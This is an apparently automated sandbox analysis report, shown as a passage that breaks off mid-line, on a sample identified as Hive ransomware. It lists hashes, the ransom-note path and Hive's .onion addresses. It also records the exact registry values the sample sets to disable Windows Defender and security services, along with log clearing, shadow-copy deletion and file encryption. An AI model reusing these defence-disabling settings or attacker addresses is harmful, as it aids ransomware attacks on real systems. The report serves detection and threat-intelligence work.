Analysis
-
max time kernel
144s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31-12-2024 23:26
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe
-
Size
3.4MB
-
MD5
3e3c64d90fb826c80e45d9f8791f76fe
-
SHA1
c7c893ef8d3550c773b3523f7c35a827cb65cc5f
-
SHA256
de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf
-
SHA512
ad2cc2abe25800e09c2c34a8943fc5698f28b59e59fb3d89c1993666a75cec42d119bc858c4fdc5114c5ad7b2416e1479811e3047a47c679d72360a536299115
-
SSDEEP
49152:i2cDtPjVrb/TVvO90dL3BmAFd4A64nsfJurbOysDrVyOYF1w86FmCKenPr8bg11I:i2yj7nO7Dpy/Zi4JJOgQ
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\etrU_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2156 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 2256 wevtutil.exe 2352 wevtutil.exe 1784 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 868 bcdedit.exe 2020 bcdedit.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 2864 powershell.exe 2460 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\System\ja-JP\wab32res.dll.mui JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\REFINED\THMBNAIL.PNG.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_ZmDeJlBE33c0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\TAB_ON.GIF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_wpprUDkbiZs0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\css\picturePuzzle.css JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\IntroducingPowerPoint2010.potx.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_q_mVSpGXjyg0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\attention.gif.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_7sPYFXnAPEk0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-border.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_znibbCyMJRY0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_RVaq6ORq4LA0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_t2zYtWd0dgY0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\INDUST.INF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_Ev8WieVM2440.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_j75uKuSEdIk0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_r-OyFoUlXhY0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_sOu-uEhIcIo0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\MS.WPG.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_sNniQ3wFbvc0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_BrTrFSUaiZc0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_UV5bd9RTC-A0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_CivwrcZFDIE0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_6EFLnij7OME0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_q20H7TO5AQY0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\1.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14997_.GIF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_RKeub5at1Is0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_IODXgo22MsA0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_RO3XuBmHfvA0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281638.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_1WCsRc0HzGo0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_dxUT6Pvhd6s0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_Bz5lskfcFqc0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-awt-j2se-1.3.2.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_xksWNXuF3Iw0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\TexturedBlue.css.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_btWNTu083C00.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\row_over.png JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File created C:\Program Files\Microsoft Games\Solitaire\es-ES\etrU_HOW_TO_DECRYPT.txt JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\.lastModified.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_kzE0-ogZuPQ0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Microsoft Games\Chess\ja-JP\Chess.exe.mui.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_9dtGd8LWrcg0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\oledbvbs.inc JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXPTOOWS.XLA.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_TjLYZiAP9Nc0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_xeldceAQeR40.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\BUTTON.GIF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_UEbL0-LiyRM0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_zWBTArXZCRg0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_sNZgXTkyfeI0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BOAT.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_erUn7JkNfp40.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Austin.thmx.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL__YLtEpKXo2Q0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Category.accft.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_gTTrfiplq9s0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\etrU_HOW_TO_DECRYPT.txt JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_uEZAjsXg2Po0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_FeOV_EsAVHI0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\PREVIEW.GIF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_Xcf2VX_0EIA0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01176_.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_JQ_lYEup6Mk0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_F8PWdXaaAEY0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WCOMP98.POC.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_7i0imBOME3A0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\split.avi JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_6f-ynXaahrY0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_2.jtp JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195248.WMF.2ApkwCyK9UGAuC0wpK03uZItgxCgtI0hioIknMPAokL_qN4_nu7Tzpg0.mhkwl JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\etrU_HOW_TO_DECRYPT.txt JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2624 sc.exe 2100 sc.exe 1184 sc.exe 312 sc.exe 1152 sc.exe 2908 sc.exe 1720 sc.exe 2436 sc.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1816 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2864 powershell.exe 2460 powershell.exe 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1784 wevtutil.exe Token: SeBackupPrivilege 1784 wevtutil.exe Token: SeSecurityPrivilege 2256 wevtutil.exe Token: SeBackupPrivilege 2256 wevtutil.exe Token: SeSecurityPrivilege 2352 wevtutil.exe Token: SeBackupPrivilege 2352 wevtutil.exe Token: SeIncreaseQuotaPrivilege 396 wmic.exe Token: SeSecurityPrivilege 396 wmic.exe Token: SeTakeOwnershipPrivilege 396 wmic.exe Token: SeLoadDriverPrivilege 396 wmic.exe Token: SeSystemProfilePrivilege 396 wmic.exe Token: SeSystemtimePrivilege 396 wmic.exe Token: SeProfSingleProcessPrivilege 396 wmic.exe Token: SeIncBasePriorityPrivilege 396 wmic.exe Token: SeCreatePagefilePrivilege 396 wmic.exe Token: SeBackupPrivilege 396 wmic.exe Token: SeRestorePrivilege 396 wmic.exe Token: SeShutdownPrivilege 396 wmic.exe Token: SeDebugPrivilege 396 wmic.exe Token: SeSystemEnvironmentPrivilege 396 wmic.exe Token: SeRemoteShutdownPrivilege 396 wmic.exe Token: SeUndockPrivilege 396 wmic.exe Token: SeManageVolumePrivilege 396 wmic.exe Token: 33 396 wmic.exe Token: 34 396 wmic.exe Token: 35 396 wmic.exe Token: SeIncreaseQuotaPrivilege 2448 wmic.exe Token: SeSecurityPrivilege 2448 wmic.exe Token: SeTakeOwnershipPrivilege 2448 wmic.exe Token: SeLoadDriverPrivilege 2448 wmic.exe Token: SeSystemProfilePrivilege 2448 wmic.exe Token: SeSystemtimePrivilege 2448 wmic.exe Token: SeProfSingleProcessPrivilege 2448 wmic.exe Token: SeIncBasePriorityPrivilege 2448 wmic.exe Token: SeCreatePagefilePrivilege 2448 wmic.exe Token: SeBackupPrivilege 2448 wmic.exe Token: SeRestorePrivilege 2448 wmic.exe Token: SeShutdownPrivilege 2448 wmic.exe Token: SeDebugPrivilege 2448 wmic.exe Token: SeSystemEnvironmentPrivilege 2448 wmic.exe Token: SeRemoteShutdownPrivilege 2448 wmic.exe Token: SeUndockPrivilege 2448 wmic.exe Token: SeManageVolumePrivilege 2448 wmic.exe Token: 33 2448 wmic.exe Token: 34 2448 wmic.exe Token: 35 2448 wmic.exe Token: SeIncreaseQuotaPrivilege 2448 wmic.exe Token: SeSecurityPrivilege 2448 wmic.exe Token: SeTakeOwnershipPrivilege 2448 wmic.exe Token: SeLoadDriverPrivilege 2448 wmic.exe Token: SeSystemProfilePrivilege 2448 wmic.exe Token: SeSystemtimePrivilege 2448 wmic.exe Token: SeProfSingleProcessPrivilege 2448 wmic.exe Token: SeIncBasePriorityPrivilege 2448 wmic.exe Token: SeCreatePagefilePrivilege 2448 wmic.exe Token: SeBackupPrivilege 2448 wmic.exe Token: SeRestorePrivilege 2448 wmic.exe Token: SeShutdownPrivilege 2448 wmic.exe Token: SeDebugPrivilege 2448 wmic.exe Token: SeSystemEnvironmentPrivilege 2448 wmic.exe Token: SeRemoteShutdownPrivilege 2448 wmic.exe Token: SeUndockPrivilege 2448 wmic.exe Token: SeManageVolumePrivilege 2448 wmic.exe Token: 33 2448 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2956 wrote to memory of 2792 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 30 PID 2956 wrote to memory of 2792 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 30 PID 2956 wrote to memory of 2792 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 30 PID 2792 wrote to memory of 2712 2792 net.exe 32 PID 2792 wrote to memory of 2712 2792 net.exe 32 PID 2792 wrote to memory of 2712 2792 net.exe 32 PID 2956 wrote to memory of 3008 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 33 PID 2956 wrote to memory of 3008 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 33 PID 2956 wrote to memory of 3008 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 33 PID 3008 wrote to memory of 2864 3008 net.exe 35 PID 3008 wrote to memory of 2864 3008 net.exe 35 PID 3008 wrote to memory of 2864 3008 net.exe 35 PID 2956 wrote to memory of 2872 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 36 PID 2956 wrote to memory of 2872 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 36 PID 2956 wrote to memory of 2872 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 36 PID 2872 wrote to memory of 2884 2872 net.exe 38 PID 2872 wrote to memory of 2884 2872 net.exe 38 PID 2872 wrote to memory of 2884 2872 net.exe 38 PID 2956 wrote to memory of 2840 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 39 PID 2956 wrote to memory of 2840 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 39 PID 2956 wrote to memory of 2840 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 39 PID 2840 wrote to memory of 2644 2840 net.exe 41 PID 2840 wrote to memory of 2644 2840 net.exe 41 PID 2840 wrote to memory of 2644 2840 net.exe 41 PID 2956 wrote to memory of 2680 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 42 PID 2956 wrote to memory of 2680 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 42 PID 2956 wrote to memory of 2680 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 42 PID 2680 wrote to memory of 2696 2680 net.exe 44 PID 2680 wrote to memory of 2696 2680 net.exe 44 PID 2680 wrote to memory of 2696 2680 net.exe 44 PID 2956 wrote to memory of 2728 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 45 PID 2956 wrote to memory of 2728 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 45 PID 2956 wrote to memory of 2728 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 45 PID 2728 wrote to memory of 1708 2728 net.exe 47 PID 2728 wrote to memory of 1708 2728 net.exe 47 PID 2728 wrote to memory of 1708 2728 net.exe 47 PID 2956 wrote to memory of 2524 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 48 PID 2956 wrote to memory of 2524 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 48 PID 2956 wrote to memory of 2524 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 48 PID 2524 wrote to memory of 2056 2524 net.exe 50 PID 2524 wrote to memory of 2056 2524 net.exe 50 PID 2524 wrote to memory of 2056 2524 net.exe 50 PID 2956 wrote to memory of 2304 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 51 PID 2956 wrote to memory of 2304 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 51 PID 2956 wrote to memory of 2304 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 51 PID 2304 wrote to memory of 2720 2304 net.exe 53 PID 2304 wrote to memory of 2720 2304 net.exe 53 PID 2304 wrote to memory of 2720 2304 net.exe 53 PID 2956 wrote to memory of 312 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 54 PID 2956 wrote to memory of 312 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 54 PID 2956 wrote to memory of 312 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 54 PID 2956 wrote to memory of 1152 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 56 PID 2956 wrote to memory of 1152 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 56 PID 2956 wrote to memory of 1152 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 56 PID 2956 wrote to memory of 2908 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 58 PID 2956 wrote to memory of 2908 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 58 PID 2956 wrote to memory of 2908 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 58 PID 2956 wrote to memory of 1720 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 60 PID 2956 wrote to memory of 1720 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 60 PID 2956 wrote to memory of 1720 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 60 PID 2956 wrote to memory of 2436 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 62 PID 2956 wrote to memory of 2436 2956 JaffaCakes118_3e3c64d90fb826c80e45d9f8791f76fe.exe 62 PID 2956 wrote to 